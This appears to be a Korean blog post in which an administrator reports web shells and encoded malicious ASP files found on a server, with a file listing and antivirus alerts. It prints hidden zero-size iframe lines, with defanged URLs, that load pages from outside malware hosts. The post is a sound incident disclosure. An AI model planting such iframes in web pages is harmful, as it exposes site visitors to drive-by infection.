2007-11-16 오후 10:31 212,480 123.asp
2007-11-16 오후 10:31 164,352 1234.asp
2007-11-16 오후 10:32 164,352 12345.asp
2007-11-16 오후 10:33 839,168 321.asp
2007-11-16 오후 10:33 839,168 aaa.asp
2008-04-12 오전 05:27 76,914 asp.asp
2008-03-30 오후 05:06 5,942 DataTypeLib.asp
2008-03-30 오후 05:05 77,030 n.asp
2007-11-16 오후 10:35 49,664 qqq.asp
2008-03-30 오후 05:06 598 shao.asp
2007-09-21 오후 06:31 79,881 shell.asp
2008-03-30 오후 05:06 25,167 side.asp
2008-03-30 오후 05:06 31,506 sqlultimate.asp
2007-11-16 오후 10:36 49,664 sss.asp
2008-05-09 오후 05:15 82,899 WebShell8.0.asp
2007-11-16 오후 10:31 164,352 1234.asp
2007-11-16 오후 10:32 164,352 12345.asp
2007-11-16 오후 10:33 839,168 321.asp
2007-11-16 오후 10:33 839,168 aaa.asp
2008-04-12 오전 05:27 76,914 asp.asp
2008-03-30 오후 05:06 5,942 DataTypeLib.asp
2008-03-30 오후 05:05 77,030 n.asp
2007-11-16 오후 10:35 49,664 qqq.asp
2008-03-30 오후 05:06 598 shao.asp
2007-09-21 오후 06:31 79,881 shell.asp
2008-03-30 오후 05:06 25,167 side.asp
2008-03-30 오후 05:06 31,506 sqlultimate.asp
2007-11-16 오후 10:36 49,664 sss.asp
2008-05-09 오후 05:15 82,899 WebShell8.0.asp
대부분 Script Encoder 로 인코딩을 해놓은 상태입니다.
내용은 뭐 대부분,. SQL 조작을 위한 것 또는 업로드된 파일을 다른 사이트를 해킹후 iframe 로 사입하는 경우등 입니다.
<iframe src="hxxp://boc.sbb22.com/home/index.htm width=20 height=0></iframe>
<iframe src=hxxp://sp.070808.net/23.htm width=0 height=0></iframe>
<iframe src="hxxp://w.aeaer.com/ae.htm" width=0 height=0></iframe>
<iframe src="hxxp://qi.ccbtv.net/btv.htm" width=0 height=0></iframe>
<iframe src="hxxp://88.881215.com/88.htm" width=0 height=0></iframe>
<iframe src="hxxp://ca.winvv.com/cn.htm" width=0 height=0></iframe>
<iframe src="hxxp://xx.9365.org/ip/1.htm" width=100 height=0></iframe>
<iframe src=hxxp://acc.jqxx.org/live/index.htm width=100 height=0></iframe>
<iframe src="hxxp://xx.9365.org/ip/1.htm" width=100 height=0></iframe>
<iframe src=hxxp://sp.070808.net/23.htm width=0 height=0></iframe>
<iframe src="hxxp://w.aeaer.com/ae.htm" width=0 height=0></iframe>
<iframe src="hxxp://qi.ccbtv.net/btv.htm" width=0 height=0></iframe>
<iframe src="hxxp://88.881215.com/88.htm" width=0 height=0></iframe>
<iframe src="hxxp://ca.winvv.com/cn.htm" width=0 height=0></iframe>
<iframe src="hxxp://xx.9365.org/ip/1.htm" width=100 height=0></iframe>
<iframe src=hxxp://acc.jqxx.org/live/index.htm width=100 height=0></iframe>
<iframe src="hxxp://xx.9365.org/ip/1.htm" width=100 height=0></iframe>
- 해당 스크립트를 브라우져에서 실행하면 웜에 감염될 위험이 있습니다. 브라우져는 javascript 실행을 disable 해놓으시고... 테스트 접속를.... -
위 asp 파일들을 로컬 윈도우 탐색기등에서 그냥 엑세스만 해도, Microsoft Forefront Client Security 에서 다음과 같은 경고가 발생합니다.
Microsoft Forefront Client Security 실시간 보호 에이전트가 변경 내용을 감지했습니다. 잠재적인 위험이 있을 수 있으므로 이러한 변경을 수행한 소프트웨어를 분석하는 것이 좋습니다. 이러한 프로그램의 작동 방식에 대한 정보를 사용하여 프로그램의 실행을 허용할지 또는 컴퓨터에서 제거할지 선택할 수 있습니다. 프로그램이나 소프트웨어 게시자를 신뢰할 수 있는 경우에만 변경을 허용하십시오. Microsoft Forefront Client Security은(는) 허용한 변경을 실행 취소할 수 없습니다.
자세한 내용은 다음을 참조하십시오.
http://go.microsoft.com/fwlink/?linkid=37020&name=Exploit:HTML/IframeRef.gen&
threatid=2147536539
검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
에이전트: IE 다운로드 및 Outlook Express 첨부 파일
사용자: WSSPLEX\Administrator
이름: Exploit:HTML/IframeRef.gen
ID: 2147536539
심각도: 심각
범주: 익스플로이트
경고 종류: 스파이웨어 및 사용자 동의 없이 설치된 소프트웨어
검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
에이전트: IE 다운로드 및 Outlook Express 첨부 파일
사용자: WSSPLEX\Administrator
이름: Virus:VBS/VBSWGbased.gen
ID: 2147536537
심각도: 심각
범주: 바이러스
검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
에이전트: IE 다운로드 및 Outlook Express 첨부 파일
사용자: WSSPLEX\Administrator
이름: Backdoor:ASP/Ace
ID: 2147593981
심각도: 심각
범주: 백도어
자세한 내용은 다음을 참조하십시오.
http://go.microsoft.com/fwlink/?linkid=37020&name=Exploit:HTML/IframeRef.gen&
threatid=2147536539
검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
에이전트: IE 다운로드 및 Outlook Express 첨부 파일
사용자: WSSPLEX\Administrator
이름: Exploit:HTML/IframeRef.gen
ID: 2147536539
심각도: 심각
범주: 익스플로이트
경고 종류: 스파이웨어 및 사용자 동의 없이 설치된 소프트웨어
검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
에이전트: IE 다운로드 및 Outlook Express 첨부 파일
사용자: WSSPLEX\Administrator
이름: Virus:VBS/VBSWGbased.gen
ID: 2147536537
심각도: 심각
범주: 바이러스
검색 ID: {80B47AE7-1DC3-41A5-96B2-B63CC2E0939B}
에이전트: IE 다운로드 및 Outlook Express 첨부 파일
사용자: WSSPLEX\Administrator
이름: Backdoor:ASP/Ace
ID: 2147593981
심각도: 심각
범주: 백도어
등등.........
댓글 없음:
댓글 쓰기